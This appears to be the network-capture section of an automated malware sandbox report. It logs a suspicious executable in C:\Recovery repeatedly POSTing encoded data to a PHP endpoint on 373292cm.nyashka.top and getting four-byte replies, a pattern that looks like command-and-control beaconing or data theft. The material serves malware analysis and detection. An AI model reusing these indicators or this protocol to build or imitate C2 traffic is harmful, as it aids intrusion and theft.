                                    Aug 25, 2024 15:44:48.674869061 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:49.029845953 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:49.076081038 CEST | 1236 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:49.368427038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:49.566720963 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    93 | 192.168.2.6 | 49821 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:49.703299999 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:50.065424919 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:50.389305115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:50.585814953 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    94 | 192.168.2.6 | 49822 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:50.724037886 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:51.076299906 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:51.419457912 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:51.718858957 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    95 | 192.168.2.6 | 49823 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:51.720071077 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:52.076334000 CEST | 1820 | OUT | [POST body]
                                    Aug 25, 2024 15:44:52.400051117 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:52.531572104 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    96 | 192.168.2.6 | 49824 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:51.737345934 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:52.091742992 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:52.435131073 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:52.569750071 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    97 | 192.168.2.6 | 49825 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:52.858716965 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:53.216969013 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:53.553256989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:53.756934881 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    98 | 192.168.2.6 | 49826 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:53.878699064 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:54.232433081 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:54.568727970 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:54.705913067 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    99 | 192.168.2.6 | 49827 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:54.841490984 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:55.226845026 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:55.536597967 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:55.737406969 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    100 | 192.168.2.6 | 49828 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:55.860450029 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:56.216856003 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:56.531467915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:56.820089102 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    101 | 192.168.2.6 | 49829 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:56.979315042 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:57.326267004 CEST | 2516 | OUT | [POST body]


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    102 | 192.168.2.6 | 49830 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:57.582565069 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:58.110150099 CEST | 1820 | OUT | [POST body]
                                    Aug 25, 2024 15:44:58.248658895 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:58.400324106 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    103 | 192.168.2.6 | 49831 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:57.771492958 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:58.127824068 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:58.458197117 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:58.654808998 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    104 | 192.168.2.6 | 49832 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:58.781116962 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:59.138873100 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:44:59.482914925 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:59.684032917 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    105 | 192.168.2.6 | 49833 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:59.814471960 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:00.170234919 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:45:00.503534079 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:00.633838892 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    106 | 192.168.2.6 | 49834 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:00.802685976 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:01.154418945 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:45:01.492856026 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:01.623974085 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    107 | 192.168.2.6 | 49835 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:01.751338005 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:02.107609034 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:45:02.444463015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:02.579654932 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    108 | 192.168.2.6 | 49836 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:02.705707073 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.113044977 CEST | 2516 | OUT | [POST body]
                                    Aug 25, 2024 15:45:03.381527901 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    109 | 192.168.2.6 | 49837 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:03.411807060 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.763684988 CEST | 1840 | OUT | [POST body]
                                    Aug 25, 2024 15:45:04.090265036 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:04.222702980 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    110 | 192.168.2.6 | 49838 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:03.531424046 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:03.888775110 CEST  2516  OUT  Data Raw: 5a 50 5c 5f 54 43 54 51 5b 5f 5a 51 59 56 58 50 57 5c 5d 59 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\_TCTQ[_ZQYVXPW\]YW_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.386735Z)= _>>-\)=#Z?7$(*#Y" _8>&F$.Y/!
                                    Aug 25, 2024 15:45:04.217706919 CEST  25  IN  HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:04.421305895 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                    111  192.168.2.6  49839  80.211.144.156  80  6244  C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp  Bytes transferred  Direction  Data
                                    Aug 25, 2024 15:45:05.276043892 CEST  269  OUT  POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:05.684885025 CEST  2512  OUT  Data Raw: 5f 56 59 54 54 41 54 50 5b 5f 5a 51 59 57 58 50 57 58 5d 52 57 58 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYTTATP[_ZQYWXPWX]RWXS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.3+"=0 #%+><<=6<-;\7?4 $V<( 0)Y/&F$.Y/
                                    Aug 25, 2024 15:45:05.969763041 CEST  25  IN  HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:06.169203043 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:05 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                    112  192.168.2.6  49840  80.211.144.156  80  6244  C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp  Bytes transferred  Direction  Data
                                    Aug 25, 2024 15:45:06.297163963 CEST  269  OUT  POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:06.654211998 CEST  2516  OUT  Data Raw: 5f 50 5c 57 54 46 54 5e 5b 5f 5a 51 59 55 58 54 57 5c 5d 5f 57 5e 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _P\WTFT^[_ZQYUXTW\]_W^SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-.#5><]#V=Y==\<%Z?>+ ( !/<#_4;.&F$.Y/-
                                    Aug 25, 2024 15:45:07.150520086 CEST  25  IN  HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:07.150948048 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:07.151000023 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:06 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                    113  192.168.2.6  49841  80.211.144.156  80  6244  C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp  Bytes transferred  Direction  Data
                                    Aug 25, 2024 15:45:07.291388035 CEST  293  OUT  POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:07.638686895 CEST  2512  OUT  Data Raw: 5a 57 59 54 54 49 51 5c 5b 5f 5a 51 59 57 58 5e 57 5e 5d 5e 57 5b 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYTTIQ\[_ZQYWX^W^]^W[SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#D5=; **#?.+>$"<!2$S?9+]#8&F$.Y/
                                    Aug 25, 2024 15:45:08.788646936 CEST  25  IN  HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:08.788928032 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:08.788960934 CEST  158  IN  HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:07 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:08.789190054 CEST  183  IN  HTTP/1.1 100 Continue
